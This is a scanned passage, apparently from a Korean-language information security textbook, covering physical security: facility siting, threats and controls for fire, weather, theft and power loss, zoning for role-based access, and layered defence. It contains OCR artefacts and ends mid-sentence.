자가 많은 비소유시설이 될수 있다. 

시설들을 다 구분하면 위험완화전략개발의 첫 단계를 거친것으로 된다. 해당 시설들 
에 고유한 위협요소들을 리해하면 그것은 그 위협을 방지하기 위한 안목을 가진것으로 
볼수 있다. 일부 시설들은 한가지 부류에만 속하지 않으므로 이 구분방식 안에 꼭 준하여 
야 한다는 법은 없다. 여기서 알아야 할것은 이 혼합부류의 시설에서 생길수 있는 새로 
운 고유한 우단점들이다. 

시설의 우 I 치 

어떤 종류의 시설을 차지하겠는가에 관심을 가질뿐아니라 그 위치에도 관심을 돌려 
야 한다. 어떤 장소는 다른 장소보다 더 많은 위험을 내포할수 있다. 

다음의 것들은 시설위치를 선택할 때 고려해야 할 위치적인 위협요소들이다. 

• 범죄, 폭동, 테로가 생길수 있는 위험성 고려하고 있는 매 지점들에 대하여 범죄 
와 테로에 대한 통계자료들을 연구해야 한다. 만일 시설의 위치가 이러한 사고 
가 빈번한 지대 라면 물리적보안이 파괴될 가능성은 커진다. 례를 들어 시설가까 
이에서 빈번한 시위와 폭동이 일어 나면 시설과 종업원 그리고 고객들을 위협할 
우발적인 폭력행위(례: 화제, 범죄 등)가 발생할수 있다. 정보보안에서도 사람의 
보호와 안전이 항상 그 무엇보다 우선시되여 야 한다. 

• 린접건물들과 그 업무종류 이 부분은 앞에서 언급한 시설의 구분(특히 공유시 
설) 및 우의 범죄나 폭동의 가능성문제와 관련된다. 자기의 이웃이 누구이며 그 
들이 무엇을 하는가를 알아 두는것은 좋은 습관이다. 례를 들어 사람들은 경쟁 
대상들，원자력발전소 혹은 위험한 화학물질수송로인 고속도도로나 철길옆에 자 
기 회사의 자료쎈터를 두려고 하지 않을것이다. 또한 이것은 옆에 련결된 건물 
의 경우도 마찬가지이다. 어떤 사람이 린접건물을 부시고 뛰여 ■어 자기 시설 
에 접근할수 있지 않겠는가，지붕은 어떤가，이것들이 다 위치를 선택할 때 제일 
먼저 생각해야 할것들이다. 

• 비상지원대책 이것은 비상지원(례: 소방대，경찰，의료일군)이 시설에 도착하는 
데 걸리는 시간으로 간단히 정의된다. 비상지원지점으로부터 시설까지의 운행거 
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리와 도달시 간(가장 통행 이 복잡할 때)을 알아야 한다. 이 정보를 알면 비상지원 
이 도착할 때까지 물리적보안대책들을 실행하여 파괴와 손실을 검출하여 저지시 
킬뿐아니 라 그것을 지원시키 고 최소화할수 있다. 

• 환경보장 환경보장은 시설에서 쓰는 깨끗한 공기，물，전력이다. 이 모든것들이 
앞으로 다 보충될수 있는 여지가 있는가를 확인해야 한다. 특히 가동률이 높은 
시설들에 대해서는 두개의 서로 다른 송전망으로부터 전력을 끌어 올수 있는 위 
치를 선택해야 한다. 

• 자연재해의 위험성 지난 100년간 그 지역에서의 자연재해현상에 대한 지리적 
및 기후적통계를 조사하여야 한다. 자연재난은 예측하기 어려우며 완전히 피할 
수도 없지만 그러한 재해가 보다 적게 일어 날수 있는 지역을 선택함으로써 자 
연재난의 후과를 최소화할수 있다. 

시설에 대한 위협과 통제 

이상의 론의내용에서 어떤 위치가 더 많은 혹은 더 적은 위협요소를 안고 있는가를 
보았다. 이제부터 위협요소들과 그 통제의 기본형태를 하나씩 보기로 한다. 한가지 위협 
요소의 근원을 제거할수 있다면 동시에 여러개를 효과적으로 제거할수 있다는것을 보여 
주자는데 목적이 있다. 뿐만아니라 두 위협요소가 서로 인과관계에 있는 경우 반대현상 
도 일어 날수 있다는것을 명심해야 한다. 통제는 사실 단순하고 기초적이지만 총체적으 
로는 해당 위협에 대하여 제지，검출, 지원，대응할수 있어야 한다. 위협요소에는 자연적 
위협요소，인공적위협요소，환경파괴의 3가지 종류가 있다. 

자연적위협요소 물리적보안이 잘되는 경우 일부 위협요소들에 대하여 심리적안정감 
을 가지 는 우점 이 생 긴 다. 그러 나 자연재 난은 그렇 지 않다. 이 재 난을 저 지하거 나 단념 케 
할수는 없다. 언제든지 자연환경은 시설에 위협으로 될수 있다. 유일한 방도는 그 영향 
을 최소화하고 빨리 복구할수 있는 통제를 실현하는것이다. 자연적인 위협요소와 그 일 
부 통제는 다음과 갈다. 

一 화재는 다음과 같은 위험성을 가지고 있다. 

• 열 

• 연기 

• 억제물(소화기재와 물)의 파괴 

一 화재통제는 다음과 같이 한다. 

• 설 비가까이 에 연기탐지 기 를 설 치한다. 

• 소화기를 설치하고 그 적절한 사용법으로 종업원들을 훈련시킨다. 

• 정 보체 계가까이 에 서 가스(비액 체 ) 소화체 계 를 리용한다. 

• 정 기적 인 화재소개훈련을 진행한다. 

• 모든 예 비 본매 체 들을 시 설 밖에 (담보가 있는 제 3자에 게 ) 보관한다. 

• 재해복구계획을 작성하고 훈련한다. 

_ 불리 한 일 기 조건 은 다음과 갈은 위 험 성 이 있 다. 
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• 홍수 

一불리한 일기조건의 통제대책은 다음과 갈다. 

• 일기조건의 감시 

• 시설을 비바람에 잘 견딜수 있는 장소에 둔다. 

• 시설이 정확히 접지되도록 한다. 

• 전압안정 기 와 무정 전전원체 계 ( UPS ) 혹은 디 젤 발전기 를 설 치 한다. 

• 바닥을 높이 설치한다. 

• 정기적인 일기대피훈련을 진행한다. 

• 모든 예 비 본매 체 들을 시 설 밖에 (담보 있는 제 3자에 게 ) 보관한다. 

• 재 해 복구계 획을 세우고 훈련한다. 

_지진은 화재와 갈은 다른 재해를 촉발시킬수 있는것으로 하여 특별히 위험하다. 
지진으로 인한 화재에 따르는 추가적파괴뿐아니라 다음과 같은 몇가지 위험이 있 
게 된다. 

• 구급대책기간으로부터 응답이 제한적으로 오거나 전혀 응답이 없다. 

• 시 설들과 정 보체 계 에 영 구적 인 구조적 , 물리 적 파괴 를 준다. 

• 위 험 요소통제 수단이 무효화된 다(례 컨대 소화기 재 들을 마비 시 킨다) . 

• 사람대피가 제한된다. 

一지진에 대 한 통제대책은 다음과 같다. 

• 정보체계설비를 높은 표면에서 내리워 보관한다(적절한 받침틀이 없이). 

• 정보체계설비를 유리창문과 떨어 지게 한다. 

• 시 설과 그의 하부구조에 지 진방지 혹은 진동방지 장치 를 설 치한다. 

• 정 상적 인 지 진훈련을 진행한다. 

• 모든 예 비 본매 체 들을 시 설 밖에 (담보가 있는 제 3자에 게 ) 보관한다. 

• 재 해 복구계 획을 세우고 훈련한다. 

자연환경의 위협은 항상 우에 렬거한것처럼 극적으로 진행되는것은 아니다. 그것은 
흔히 훨씬 더 미묘하고 예상외의 형태로 일어 날수 있다. 그 한가지 실례가 건조한 열， 
습기 그리고 약한 바람에 오래동안 로출되는것이다. 덜 심각한 이런 위협요소는 사람들 
에게 즉시적 인 경보를 울릴것은 못되지만 그것 이 일으킬수 있는 후과는 알아야 한다. 

인공적인 우 I 협요소 위협요소의 두번째 부류는 인공적인 위협요소이다. 이 위협요소 
들은 흔히 사람들의 본성과 련관되 는것 으로 하여 가장 동적이며 막기 힘들다. 이것은 인 
공적위협요소들에 악의，기회，우연이라는 세가지 자극제가 있는 사실과 관련된다. 인공 
적인 요소들과 그 몇가지 통제대책들은 다음과 같다. 

_절도/사기는 다음과 갈은 위험성을 가진다. 

• 정보체계기능의 저하 혹은 손실 








• 비밀정보나 영업비밀의 손실 

• 수입금의 손실 

_절도/사기에 대한 통제대책들에는 다음과 같은것들이 있다. 

• 건물과 층，방들이 감시되고 있으며 시설을 드나드는 사람들은 검사받는다는 
내용의 표시글을 해당 장소들에 불여 놓는다. 

• 감시카메 라들을 볼수 있는 장소들에 설치한다. 

• 종업원들속에서 보안 및 안전의식을 높여 준다. 

• 식별휘장을 단다. 

• 경비원 

• 위 치표식물의 리용을 최소화한다. 

• 정기적인 실사 

• 훌륭한 재고관리관계 그리고 재고통제를 엄격히 한다. 

• 관건장치를 잘한다. 

• 보험 

• 직능 및 직무교대의 분리 

• 종업원채용/해고방식 

一간첩활동은 다음의 위험성을 내포한다. 

• 기밀정보나 영업기밀의 손실 

• 경쟁력의 손실 

• 수익의 손실 

一 간첩 활동에 대 한 통제 대 책 들은 다음과 갈다. 

• 건물과 층，방들이 감시되고 있으며 시설을 드나드는 사람들은 검사받는다는 
내용들을 해 당 장소들에 불여 놓는다. 

• 감시카메라들을 보이는 곳에 설치한다. 

• 종업원들속에 보안 및 안전자각을 높여 준다. 

• 식별휘장을 단다. 

• 위 치표식물의 리용을 최소화한다. 

• 경비원 

• 종업원채용/해고방식 

• 직능 및 직무교대의 분리 

• 정기적인 실사 

一태업은 다음의 위험성들을 가지고 있다. 

• 정보체계능력의 감소 혹은 손실 

• 기밀정보나 영업비밀의 분실 

• 수익의 분실 

_태업에 대한 통제대책들은 다음과 같다. 

• 건물과 층，방들이 감시되고 있으며 시설을 드나드는 사람들은 검사받는다는 
내용의 표시글을 해당 장소들에 불여 놓는다. 

• 감시카메라들을 보이는 곳에 설치한다. 
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• 종업원들속에 보안 및 안전자각을 높여 준다. 

• 위 치표식물의 리용을 최소화한다. 

• 식별휘장을 단다. 

• 경비원 

• 보험 

• 직능 및 직무교대의 분리 

一작업장폭력행위에는 다음의 위험성이 있다. 

• 종업원이상하거 나죽는다. 

• 생 산력 의 손실 

• 수익의 손실 

一작업장폭력행위에 대한 통제대책들은 다음과 같다. 

• 건물과 층, 방들이 감시되고 있으며 시설을 드나드는 사람들은 검사받는다는 
내용의 표시글을 해당 장소들에 불여 놓는다. 

• 감시카메 라들을 보이는곳에 설치한다. 

• 종업원들속에 보안 및 안전자각을 높여 준다. 

• 경고표식물의 의식 

• 경비원 

• 종업원채용/해고방식 


사람에 게 는 재 능과 적 응성 이 라는것 이 있으므로 인공적 위 협 요소들은 통제 하기 가 어 렵 
다. 각 기관들은 이러한 위협들에 대처하여 취해 진 통제조치들에 대하여 정기적으로 평 
가함으로써 자체의 보호계획을 각성 있게 점검해야 한다. 

환경적우 I 협요소 위협요소의 세번째 부류는 환경적인 위협요소들이다. 환경적통제조 
치들은 정보와 그 체계의 운영 및 안전성을 보장하는데서 중요하다. 깨끗한 공기，물，동 
력 그리고 믿음직한 온습도조절장치들이 없다면 정보체계는 일관성 있게 운영되지 못하 
고 완전한 파괴를 당할수도 있다. 

—온습도파피는 다음과 갈은 위험성을 가져 온다. 

• 시설과 하부구조가 과열로 하여 오동작 혹은 고장이 생긴다. 

• 보존매체나 예비본매체가 파손된다. 

• 기밀설비요소가 파손된다. 

一 온습도파괴의 통제대책들은 다음과 같다. 

• 정보체계설비의 온도를 감시한다. 

• 정보체계설비가 있는 모든 방들에서 합리적인 온도 10〜 25 °C 를 유지한다. 

• 습도를 20〜70%로 유지 한다. 

• 정보체계설비가 있는 방에서 불필요한 조명장치들을 끄도록 한다. 

• 온습도조절체계의 정상적 인 점검과 감시를 진행한다. 

• 모든 예 비 본매 체 들을 외 부에 (담보가 있는 제 3자에 게 ) 보관한다. 

• 재해복구계획을 작성하고 훈련한다. 


633 






_ 물과 액체류출은 다음의 위험성을 내포한다. 

• 시설과 하부구조가 물이나 다른 형태의 액체에 지나치게 접촉하여 고장이 나 
는 경우가 있다. 

• 보존/예비본매체와 중요한 종이서류로 된 정보가 손상된다. 

• 중요한 설비요소들이 손상된다. 

一물과 액체류출에 대 한 통제대책들은 다음과 갈다. 

• 시설가까이 에 방수포를 준비 하여 둔다. 

. 중요한 정보체계설비가 있는 방들에 물빼기시설, 물수감기를 설치하고 바닥 
도 높여 야 한다. 

• 상하수도관을 정기적으로 검사한다. 

• 정 보체계 가까이 에서는 기체소화기 를 리 용한다. 

• 모든 예 비 본매 체 들을 외부에 (담보가 있는 제3자에게) 보관한다. 

• 재해복구계획을 작성하고 훈련한다. 

_정전은 다음과 갈은 위험성을 가진다. 

• 중요한 설비요소가 파괴된다. 

• 쏘프트웨어 와 기 억 /예비 본매 체 들이 파괴 된 다. 

• 온습도조절 장치 가 손상된 다. 

• 물리 적 접 근조종장치 들이 나 감시 기 구의 손상(례 : 감시 촬영 기 , 출입 문경 보장치， 
ID 카드읽기 장치). 

一정전통제장치들은 다음과 갈다. 

• 무정 전전원장치 나 디 젤 발전기 를 설 치한다. 

• 자동안정기를 리용한다. 

• 전압파동을 조종하기 위한 전원 단려 파기 를 설 치한다. 

• 정 전기차단장치 와 대 전방지수단을 쓸수 있으면 설 치한다. 

• 모든 설비가 정확히 접지되였는가를 확인한다. 

• 회로 및 도선을 정기적으로 검열한다. 

• 두개의 서로 다른 송전만으로부터 전력을 끌어 온다(가능하다면). 

• 모든 예 비 본매 체 들을 외부에 (담보가 있는 제3자에게) 보관한다. 

• 재해복구계획을 작성하고 훈련한다. 

환경적파괴는 그자체만으로도 정보체계에 상당한 손상을 줄수 있는 위협요소이다. 
그러나 환경적인 조건의 파괴는 또한 자연적 혹은 인공적인 요인에 의해서도 나타날수 
있다. 그러므로 방어심도가 깊은 계층적인 방법으로 모든 위협을 대 하는것 이 중요하다. 
그래 야 대 부분의 위 협 요소들을 다 통제할수 있을뿐아니 라 그 통제 수단들이 그 포괄범 위 
에 있어서도 철저성이 보장된다. 

시설보호전략 

물리적보호를 위한 전반적인 전략을 작성하는것은 정보보안을 성과적으로 실현하는 
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여러 단계들중의 하나이다. 보호전략에는 방책들이 여러가지가 있을수 있으며 그러므로 
어느것이 더 큰 중요성을 가지는가에 따라 정보의 비밀성，무결성，리용성중 어느 하나가 
중요시 될 것 이 다. 구획 화 ( zoning ) 는 효률적 이 며 효과적 인 정 보보호를 위한 물리 적토대 를 
구축하는 한가지 전략이 다. 

구획하. 구획화는 새로운 개념이 아니다. 전통적으로 구획화란 숨겨 진 위치(천정우， 
지 하 등)에 있는 불이 나 연기 를 알아 내 는 화재감시경 보기 를 설 치하는데 쓰이 는 하나의 
공정을 말한다. 또한 지금까지 호상구획화 ( cross - zoning ) 라는 개념이 쓰이였는데 그것은 
둘 혹은 그이상의 경 보기들이 울리 게 함으로써 허위경 보를 줄이게 한다. 

구획화는 매 우 유연하며 가장 단순한것 으로부터 가장 구체 적 인 보안모형 에도 다 
리용된다. 이로부터 다른 모든 물리적보안통제수단들(례: 움직임탐지기，물리적침입탐 
지 경보기，감시 카메 라 등)에 도 이 구획화개 념 을 적 용할수 있다. 가장 큰 우점 은 역 할 
에 기초한 접근조종모형이라는데 있다. 역할에 기초한 접근조종방식에서는 사용자들이 
기 관에서의 자기 들의 역 할에 따라 체 계，정 보 그리 고 물리적지역 에 대 한 접근권을 부 
여 받는다. 

그림 43 — 1은 역 할에 기 초한 접 근조종을 위한 구획화의 기 초적 인 실례 를 보여 준다. 
이 실례 에서 1구획부터 4구획까지 표식 되 며 4는 가장 제 한이 크다. 이 시 설 에서 매 개 종 
업원은 1，2 및 3지 역 에 대 한 접 근권을 가지 지 만 정 보기 술부장，정 보기 술부원들 그리 고 
보안관리자는 자신들의 역 할로 하여 1，2, 3 및 4지 역 에 대 한 접 근권을 가진다. 


접수구역 
구획 2 


그림 43-1. 역할에 기초한 접근조종의 구획화 

보안이 점 진적 이라는것 은 명 백하다. 시설의 보다 깊은 곳으로 들어 갈수록(왼쪽에 서 
오른쪽으로) 구획들은 더욱 제한성을 가진다. 일단 이것이 완성되면 다음 단계는 접근통 
제 구획 들에 설 치 하여 야 할 통제 기 구들을 결 정 하는것 이 다. 보다 제 한적 인 구획 일 수록 통 
제 가 보다 강하고 믿음직해 야 한다는것을 명심해 야 한다. 
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물리적접근조종과 역할에 기초한 통제 그리고 구획화를 결합하면 정보와 재산을 
물리적으로 보호하는 철저하고도 중앙집권적인 체계를 세울수 있다. 구획화는 정보보 
안전략에서 매우 중요한 부분으로 될수 있다. 그러나 구획화실시에 앞서 먼저 위험분 
석(재산에 대한 위협들과 약점의 리해)을 하여야 하며 위험축소전략을 세워야 한다. 오 
직 그때에만 구획화는 기관의 정보보안목표를 달성할수 있는 견고한 기초를 마련할수 
있을것이다. 


정보체계의 물리적보안 


물리적보안의 둘째 부분은 정보체계에 대한 물리적보호이다. 이미 언급한것처럼 
보호는 계층적이여야 한다. 만일 기관의 콤퓨터가 단 한대라도 물리적으로 그 무결성 
이 손상된다면 정보체계는 위험에 빠질수 있다. 만일 어떤 사람이 한 를퓨터에 비법 
적으로 물리적으로 접근한다면 그 사람은 그 를퓨터의 모든 정보들에 대하여 지어는 
그 콤퓨터와 련결된 다른 자원들(파일봉사기，메인프레임전자우편 등)에 대해서도 접 
근할수 있다. 

정보체계의 분류 

정보체계는 세가지 형태로 분류할수 있다. 

• 봉사기/메인프레임 보통체계에서 물리적으로 가장 안전한 부류이다. 그것은 이 
체계들을 일정한 형태의 접근통제와 환경통제가 있는 위치에 두는것과 관련된다. 
이 형태가 비록 가장 안전하다 하더라도 그 전반적인 보안은 그것에 접근할수 
있는 워크스테 이션과 휴대형장치들의 물리적보안에 달려 있게 된다. 

• 워크스테이션 보통시설에서보다 열린 지역，보다 접근하기 쉬운 장소에 위치하고 
있다. 일하는 곳에서 쉽게 사용할수 있는것으로서 워크스테이션들은 주의해서 
쓰지 않으면 물리적보안문제를 일으킬수 있다. 

• 휴대형기구 기관의 보안상 큰 골치거리로 될수 있다. 비록 종업원들에게 무릎형 
를퓨터와 PDA 를 공급하는것 이 기관의 유연성과 생산성을 높이기는 하지만 그것 
은 물리적보안상 몇 가지 심 각한 위 험성을 안고 있다. 임의의 장소에서 회 사의 
내부정 보체계 에 사용자들이 들어 올수 있는것과 함께 어느 한가지의 휴대형기 구 
에 서 물리 적보안이 위 반되 면 기 관의 정 보보안이 크게 뒤 흔들릴수 있 다. 이 부류 
에 극도의 주의 를 돌려야 한다. 

정보체계에서 물리적우 I 협과 그 통제방법 

정보체계를 분류하면 어떤 위협이 어느 체계에 대하여 더 큰 손실을 주는가를 쉽게 
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결정할수 있다. 이렇게 되면 통제수단을 어떻게 적용하겠는가에 대한 방향이 서게 된다. 
아마 정보체계에 대한 가장 큰 위협은 사용자들의 위협일것이다. 만일 어떤 사용자가 자 
기의 콤퓨터를 물리적으로 보호하는데 응당한 노력을 기울이지 않으면 거의 모든 통제수 
단이 무력하게 되고 그 장치는 결국 위험하게 될것이다. 이 부분에서는 정보체계에 대한 
기초적 인 위협요소들과 그 통제수법들을 개괄한다. 

_손실/절도/파피는 다음과 같은 위험성을 가진다. 

• 기밀정보나 영업비밀의 손실 

• 생산의 손실 

• 수익의 손실 

_손실/절도/파피 에 대 한 통제 방법 

• 장치들에 대 한 물리적 인 관건장치 

• 장치에 표식과 딱지붙이기 

• 위치표식물리용의 최소화 

• 기밀정보보관의 암호화 

• 기밀정보들에 대한 자료분류와 처리절차 

• 보험 

• 정보보안의식화교육 

• 감시카메 라를 보이는 곳에 설치하기 

• 경비원 

• 경 보체 계 

• 정기적실사 

一비법접근名: 다음과 같은 위험성을 가진다. 

• 기밀정보나 영업비밀의 손실 

• 정보를 마구 변경하는것 

• 부정 쏘프트웨 어 

• 수익손실 

_비 법접근에 대 한 통제 방법 

• 조종탁관건장치 

• 좋은 암호를 잘 사용하는 습관 

• 정보보안의식화교육 

• 기밀정보에 대한 자료분류와 처리절차 

• 위치표식물리용의 최소화 

• 감시카메 라를 보이는 곳에 설치하기 

• 기밀정보보관의 암호화 

• 강력한 인증조종 및 접근조종 


637 




보안의식화교육 


비 록 오늘 세계적 으로 정 보체 계 가 전례 없 이 널 리 리 용되 지 만(앞으로 더 욱 그렇게 될 
것이다) 우리는 여전히 물질적인 세계에서 살고 있다. 모든 종업원들이 물리적보안에 영 
향을 주며 그것은 기관의 정보보안에 직접적으로 영향을 미친다. 일반적으로 물리적보안 
이 파괴 되 는것 은 통제 수단을 대 다수의 종업 원들이 모르기 때 문인것 이 다. 모든 종업 원들에 
게 정상적으로 강습을 주는것은 본의아닌 보안우회를 줄이는 한편 위험을 완화하기 위한 
경제적인 방도로 된다. 정보보안계획이 얼마나 잘 설계되고 실현되였든 관계없이 모르 
는 종업원이 한명이라도 있으면 보안이 다 파피되게 된다. 물리적보안은 반드시 의식화 
계획에서 하나의 제목으로 되여야 하며 다음과 같은것을 포함해야 한다. 

• 모든 종업원들에게 그들이 물리적보안에 대하여 조금만 홀시해도 얼마나 빨리 
정보보안사고가 나며 혹은 생명을 잃는데까지 이르게 되는가를 보여 주어야 
한다. 

• 종업원들을 기관의 보안기준과 지침에 기초하여 교육해야 한다. 종업원들이 그 
에 대하여 응당한 책 임감을 가지게 해 야 한다. 

• 정보보안과 관련된 월간출판물을 모든 종업원들에게 배포해야 한다. 거기에서 
물리적보안을 정기적인 화제로 취급해야 한다. 

• 경영진에 특별한 방향을 제기하여 순회시찰도 하게 함으로써 정보보안이 어떻게 
실행되는가를 막뒤에서 보게도 하여야 한다. 이것은 지지를 불러 일으킬것이다. 

의식화에 시간과 노력을 들이는것은 개인의 물리적보안뿐아니라 전망적인 정보체계 
의 효과성을 높일것이다. 종업원들이 자기의 책임을 알게 하면 그들속에서 주인다운 자 
각과 의무감을 불러 일으킬수 있다. 이것은 사람들이 가지고 있던 보안상 불리한 점을 
유리한 점으로 전환시 킨다. 


요 약 


물리적보안은 정보보안에서 적지 않은 지위를 차지한다. 일부 경우에 기관들은 훌륭 
하고 강력한 물리적보안을 갖추지만 정보보안의 다른 많은 요소들이 부족하다. 정보보안 
실천자들은 반드시 그 범위를 리해해야 하며 자산을 보호하기 위해 물리적보안을 어떻게 
리용해야 하는가를 잘 알아야 할것이다. 완벽한 물리적보안은 모든 재산을 보호할뿐아 
니라 다른 형태의 보호를 구축할수 있는 훌륭한 기초를 마련해 줄것이다. 물리적보안이 
정보보안의 기초라는것은 명백 하다. 
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제 4 4 장. 물리적보안 


브루스 아르 매슈 


Security (si kyoore'te) n„ pi. -ties 1. 안전감을 느낌; 공포，의심 등에서의 해방， 2. 보호; 
보호수단 


웹 스터사전의 이 정의는 보안실천가들을 위하여 접 근조종이라고 다시 정 의할수 있다. 
정보기술보안실천가들의 모든 사업측면은 사실 정보에 대한 접근을 정의하고 실천하며 
감시하는 과정의 련속이다. 여기에는 물리적인 접근도 포함되여 있다. 물리적인 보안을 
언제 얼마나 리용하며 그것을 전통적 인 정 보기술보안에 어 떻게 가장 잘 결합시키겠는 
가 하는 문제들은 IT 보안전문가들이 알아야 할 개념들이다. IT 보안을 전공한다고 하여 
반드시 기술전문가가 되여야 할 필요는 없다. 기술전문가는 다른 사람들이 할수도 있 
는 일이지만 보안방책과 전략들이 잘세워 지자면 물리적보호의 장점은 물론 단점들까 
지 도 고려해 야 한다. 성 공하는가 못하는가 하는것 은 물리 적 인 보안담당자들과 긴밀 히 
협 조하는데 달려 있다. 그들은 정 보기 술보안이 상의것 을 알고 있기때 문에 서 로가 하는 
사업들을 호상 존중해 주면 사업이 더 잘되여 나갈수 있게 된다. 특히 사고가 나는 경 
우 갈은 때 에는 서 로 강습을 진행하면 크게 도움이 될수 있다. 본질상 계층적이며 학 
과적인 보안을 실현하면 안전한 느낌을 가지며 공포와 의심 에서 해 방될수 있다. 통제 
적 인 접 근이 곧 보안이다. 


보안은 접근조종이다 


보안이라고 하면 흔히 실현의 견지 에서만 보안을 생 각한다. IT 보안에서 는 통과암호 
와 방화벽 이 떠오른다. 개 인신상보안에서는 어두운 골목길，수상한 자들을 피함으로써 강 
간이나 강탈을 피하는것이 떠오른다. 그러나 IT 보안의 견지에서 물리적보안을 고찰하려 
면 보안을 어떻 게 실행하는가 하는 문제 보다도 보안이 란 무엇 인가를 잘 알 필요가 있다. 
가장 간단히 말하면 보안은 결 국 접 근조종이 다. 따라서 보안실현 이라고 하는것 은 접 근을 
조종 혹은 통제하는 과정 이 다. 통과암호와 방화벽들은 망자원들과 자료자원들에 대한 접 
근을 통제하는 역 할을 한다. 어두운 골목길 이 나 수상한자들을 피 하는것은 우리의 생명과 
소지 품에 대 한 접근을 통제하는 역 할을 한다. 마찬가지 로 주택 에서의 보안은 출입 문들과 
창문들에 잠그는 관건장치들에 귀착된다. 이 관건장치들이 있음으로 하여 보호구역에로 
의 사람들의 접 근을 통제하는것 이 다. 정 확한 열쇠를 가지지 않으면 누구든 들어 갈수 없 
게 되여 있다. 필요한 사람에게만 열쇠를 줌으로써 접근을 통제하는것이다. 최근에 가정 
용경보장치들은 인기가 더욱 높아 지고 있다. 이 장치들도 역시 은밀한 방법으로 집에 



침 입 하는자들의 행 동을 제 한함으로써 접 근을 통제 조종한다. 

보안이 접근조종이라는 이 정의는 우리가 잘 알고 있는 정보보안의 기본개념인 리용 
성，무결성，비밀성개념들에도 그대로 적용된다. 리용성은 필요한 경우에 자료에 대한 접 
근을 담보하는것이다. 무결성은 자료가 변경되지 않았다는것을 의미한다. 그렇게 함으로 
써 자료변경을 위한 접근권은 합법적 인 사람이나 프로그람에만 한정된다. 

비밀성은 정보를 인증 받은 사람에게만 보이도록 한다는것이다. 결국 비밀성은 자료 
를 읽기 위한 접근을 조종한다. 이상의 모든 개념들은 서로 다른 측면에서 자료에 대한 
접근을 조종한다. 리상적으로 보면 안전담보란 접근에 대한 조종의 정도와 같다고 할수 
도 있다. 그러나 현실세계에서는 그 담보가 사람들이 통제수단들을 얼마나 신뢰하는가 
하는 정도와 같다고 하는것이 더 정확하다. 높은 수준의 담보는 접근조종수단들이 은을 
내고 있다는 높은 수준의 신심，믿음과 갈다. 례를 들어 창문에 관건장치를 하는것은 중 
간정도의 담보만을 준다. 그것은 결심을 품은 침입자가 창문을 쉽게 깰수 있다는것을 알 
고 있기때문이다. 그러나 침입자가 유리를 깨는 소리에 의해 발각될수 있으므로 어느정 
도 접근조종이 담보된다. 

접근이 적다고 하여 보안이 언제나 더 잘 보장되는것은 아니라는것을 명심해야 한다. 
즉 접근조종은 접근거부와 다르다. 창문에 쇠를 잠그는것은 총체적으로 접근거부를 위 한 
하나의 통제수단이다. 실지 모든 통제수단들은 완전접근과 완전거부사이의 구간에서 실 
시되는것만은 명백하다. 그렇기때문에 보안을 보장하는것은 접근의 량이 아니라 접근조 
종의 수준이 다. 그러한 통제수단들에 대한 신뢰도에서 곧 담보가 나오게 된다. 

이로부터 계층적방어라는 다음의 화제가 제기된다. 

계층적방어 


계층적방어는 보호를 일정하게 여유 있게 확대함으로써 접근조종에 대한 신뢰도를 
높여 준다. 물리적보안을 위한 계층적방어의 세부설계는 이 장에서 취급할 내용이 아니 
므로 경험 있는 물리보안전문가에 의하여 다루어 져야 할 문제이다. 그러나 정보기술보 
안전문가는 계층적방어의 우점과 그것이 보안에 주는 영향을 평가할수 있어야 한다. 계 
층적방어의 설계를 위하여 필자는 범위，심도，억제라는 세가지 원칙을 제기한다. 

범위의 적용을 하나의 벽에 구멍들을 여러개 뚫는것으로 생각하자. 매개 구멍들은 
여기서 서로 다른 취약점들을 나타낸다. 단 한가지의 통제수단이 이 모든 취약점을 제거 
할수 없으므로 여기에 범위개념이 리용된다. 먼저 이것을 누구나 다 알고 있는 정보기술 
세계와 련관시켜 보자. 한 사람이 접속개시암호(단어)로 자료에 대한 읽기접근을 통제하 
기로 결심하였다고 하자. 그러나 접속개시통과암호는 인터네트로 전송되면 보호 받을수 
없다. 그러므로 다른 형태의 통제수단(례: 암호화)이 추가적으로 요구된다. 물리적보안은 
곡갈은 방법으로 동작한다. 례를 들어 단층짜리의 자그마한 제품창고에 있는 상시대기실 
에 대한 접근조종이 필요하다고 가정하자. 그 시설에는 앞문，뒤문，큰 차고문，그리고 열 
지 못하는 고정창문들이 있다. 출입문들에 있는 관건장치들은 내부에로 들어 가는 하나 
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의 통로만을 통제하지만 깨질수 있는 창문들에 대한 보호는 제공하지 못한다. 결국 창문 
에 빗장을 질러 주어야 전반적범위에 대한 완전한 방어를 할수 있게 된다. 

둘째 원리인 심도는 흔히 계층적방어에서 가장 중요한 측면임에도 불구하고 무시되 
군 한다. 보안이 실천적으로 되자면 반드시 실패도 맛 보아야 한다. 그 어떤 통제수단이 
라도 완전한것은 없으며 언제든지 파손될수 있다. 그러므로 심도를 보장하기 위하여 추 
가적 인 접 근조종계 층들을 뒤선에 덧 치 는것 이 다. 본질에 있 어서 하나의 벽 이 여 러 개의 벽 
으로 겹겹이 된 셈이다. 류사한 문제로서 사용자통과암호를 보자. 통과암호는 영원히 비 
밀로 될수는 없으며 지어 하루도 비밀로 되지 못하는 경우까지 있다. 그것은 사용자들이 
통과암호를 어디에 써놓거나 공유하는 습관이 있기때문이다. 격정할 필요는 없다. 아무리 
교양과 훈계를 하여도 통과암호체계 가 잘못될수 있다는것은 다 아는 사실이 다. 그러므로 
《몸에 지니고 있는것》，《머리속에 알고 있는것》,《신원으로 될수 있는것》을 리용하 
게 된다. 우리가 흔히 쓰는 통과암호는《머리속에 알고 있는것》의 부류이다. 나머지것 
들은 인증체계에 일정한 정도의 심도를 추가적으로 보장해 준다. 《몸에 지니고 있는 
것》인 스마트카드와 갈은 추가적인 보호층을 부가하면 심도가 실현된다. 이렇게 되여야 
통과암호 하나가 로출되여도 접근조종은 여전히 가능할수 있다. 그러나 스마트카드에도 
역시 재현성 이 있으므로 통제수단검증을 위한 실사를 꼭 하여 수복하여 야 물리적보안이 
다시 자기 궤도에서 보장되게 된다. 

물리적보안에서 심도는 보통 바깥경계선 즉 보호하려는 대상으로부터 멀리 떨어 진 
구역에서부터 그 대상가까이의 중심구역으로 들어 오면서 보장되여 야 한다. 리론상 접근 
조종의 매개 계층은 동심원을 이룬다(비록 완전히 둥근 시설은 없지만). 매 계층에 대한 
구획은 흔히 마당의 울타리，건물입구와 바깥면，건물의 매 층，통합사무실들，개별사무실， 
서류장 및 서류금고로 갈라 본다. 

셋째 원칙인 억제는 충분한 통제수단들을 배치함으로써 잡히지 않으면서도 그것들을 
파괴 하는것을 목표로 노린 대상물의 가치보다 더 원가가 들거 나 타당성 이 없게 하는것 이 
다. 만일 훔쳐야 할것이 5，( X )0 딸라짜리 예비용봉사기인데 뒤골목에서 팔면 1，( X )0 딸라밖에 
